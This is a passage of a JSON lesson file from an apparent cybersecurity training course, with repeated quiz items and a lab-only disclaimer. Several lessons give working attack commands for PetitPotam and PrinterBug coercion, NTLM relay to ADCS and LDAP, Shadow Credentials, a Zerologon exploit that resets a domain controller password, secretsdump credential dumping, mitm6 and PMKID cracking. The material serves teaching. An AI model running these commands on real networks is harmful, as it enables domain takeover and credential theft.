layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-petitpotam2","cat":"Network Attacks","title":"PetitPotam Coerced Authentication","diff":4,"xp":250,"intro":"Force a DC to authenticate to your listener using MS-EFSRPC.","sections":[{"type":"text","content":"PetitPotam abuses the Encrypting File System Remote Protocol to make any Windows machine authenticate to your listener. Combined with NTLM relay, it's devastating."},{"type":"code","lang":"bash","content":"# Coerce authentication\npython3 PetitPotam.py attacker_listener target_dc\n# Relay to ADCS for a certificate\nimpacket-ntlmrelayx -t http://ADCS/certsrv/certfnsh.asp -smb2support --adcs\n# Or relay to LDAP\nimpacket-ntlmrelayx -t ldap://DC --escalate-user myuser"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"PetitPotam abuses which protocol?","opts":["SMB","MS-EFSRPC (Encrypting File System Remote Protocol)","RDP","DNS"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-printerbug2","cat":"Network Attacks","title":"PrinterBug / SpoolSample","diff":3,"xp":200,"intro":"Force a machine to authenticate using the Print Spooler service.","sections":[{"type":"text","content":"The Print Spooler service can be tricked into authenticating to an arbitrary host. Any machine with Spooler running is vulnerable."},{"type":"code","lang":"bash","content":"python3 printerbug.py domain/user:pass@target attacker_listener\n# Or SpoolSample\nSpoolSample.exe target attacker_listener\n# Combined with unconstrained delegation:\n# Capture the target's TGT"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"PrinterBug exploits which service?","opts":["DNS","Print Spooler (MS-RPRN)","IIS","DHCP"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-shadow-credentials","cat":"Network Attacks","title":"Shadow Credentials Attack","diff":4,"xp":250,"intro":"Add a key credential to a computer account to authenticate as it.","sections":[{"type":"text","content":"If you can write to a computer object's msDS-KeyCredentialLink attribute, add your own key credential. Then use PKINIT to authenticate as that computer."},{"type":"code","lang":"bash","content":"# Add shadow credential\npython3 pywhisker.py -d domain.local -u user -p pass --target DC$ --action add\n# Authenticate with the added credential\npython3 gettgtpkinit.py domain.local/DC$ DC.ccache -pfx-base64 CERT\n# Use the TGT\nexport KRB5CCNAME=DC.ccache\nimpacket-secretsdump -k -no-pass DC.domain.local"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Shadow credentials require write access to...","opts":["ntds.dit","msDS-KeyCredentialLink attribute","The SAM database","Group membership"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-zerologon","cat":"Network Attacks","title":"Zerologon (CVE-2020-1472)","diff":4,"xp":250,"intro":"Reset the DC machine account password to empty via a crypto flaw.","sections":[{"type":"text","content":"Zerologon exploits a flaw in the Netlogon protocol's AES-CFB8 usage. By sending all-zero challenges, there's a 1-in-256 chance the ciphertext is also all zeros."},{"type":"code","lang":"bash","content":"# Test for vulnerability\npython3 zerologon_tester.py DC_NAME DC_IP\n# Exploit (resets DC password to empty)\npython3 set_empty_pw.py DC_NAME DC_IP\n# Now authenticate with empty password\nimpacket-secretsdump -just-dc DC_NAME$@DC_IP"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Zerologon exploits a flaw in...","opts":["SMB signing","The Netlogon protocol's AES-CFB8 implementation","Kerberos","LDAP"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-ipv6-router-advert","cat":"Network Attacks","title":"IPv6 Router Advertisement Attack","diff":3,"xp":200,"intro":"Become the default IPv6 gateway using rogue router advertisements.","sections":[{"type":"text","content":"On dual-stack networks, send rogue IPv6 router advertisements. Clients prefer IPv6 and route traffic through you."},{"type":"code","lang":"bash","content":"# mitm6: become the IPv6 gateway\nmitm6 -d target.local\n# Combined with ntlmrelayx\nimpacket-ntlmrelayx -6 -t ldaps://DC -wh fake-wpad.target.local -l loot"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"IPv6 RA attacks work because...","opts":["IPv6 is faster","Most networks have IPv6 enabled but no IPv6 firewall rules","IPv6 is encrypted","IPv6 requires authentication"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-wifi-pmkid","cat":"Network Attacks","title":"PMKID WiFi Attack","diff":3,"xp":200,"intro":"Capture PMKID from the AP without deauthing any clients.","sections":[{"type":"text","content":"Request association with the AP. The first message contains the PMKID, derived from the PMK (password-based). Crack it offline."},{"type":"code","lang":"bash","content":"# Capture PMKID (no client needed)\nhcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1\nhcxpcapngtool capture.pcapng -o hash.22000\nhashcat -m 22000 hash.22000 rockyou.txt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"PMKID attack advantage over handshake capture...","opts":["It's faster","No client deauthentication needed (clientless)","It works on WPA3","It's automated"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-netbios-enum","cat":"Network Attacks","title":"NetBIOS Enumeration","diff":1,"xp":75,"intro":"Discover Windows machines and their shares via NetBIOS.","sections":[{"type":"text","content":"NetBIOS (ports 137-139) reveals: computer names, domain names, MAC addresses, logged-in users, and shared resources."},{"type":"code","lang":"bash","content":"nbtscan 192.168.1.0/24\nnmap -sU -p 137 --script nbstat target\nnmblookup -A target\nnet view \\\\target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"NetBIOS enumeration reveals...","opts":["Only IP addresses","Computer names, domains, users, and shares","Only open ports","Only MAC addresses"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"n-scapy-packet-craft","cat":"Network Attacks","title":"Packet Crafting with Scapy","diff":3,"xp":200,"intro":"Build custom network packets for testing and exploitation.","sections":[{"type":"text","content":"Scapy lets you craft any packet: custom IP/TCP/UDP headers, protocol fuzzing, and specialized attacks. It's Python-based and infinitely flexible."},{"type":"code","lang":"python","content":"from scapy.all import *\n# SYN scan\nans = sr1(IP(dst='target')/TCP(dport=80, flags='S'), timeout=2)\n# ARP request\nans = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst='192.168.1.0/24'), timeout=2)\n# Custom ICMP\nsend(IP(dst='target')/ICMP(type=8)/Raw(load='AAAA'))"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Scapy is powerful because...","opts":["It's fast","It allows building ANY network packet from scratch in Python","It's automated","It uses GUI"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate 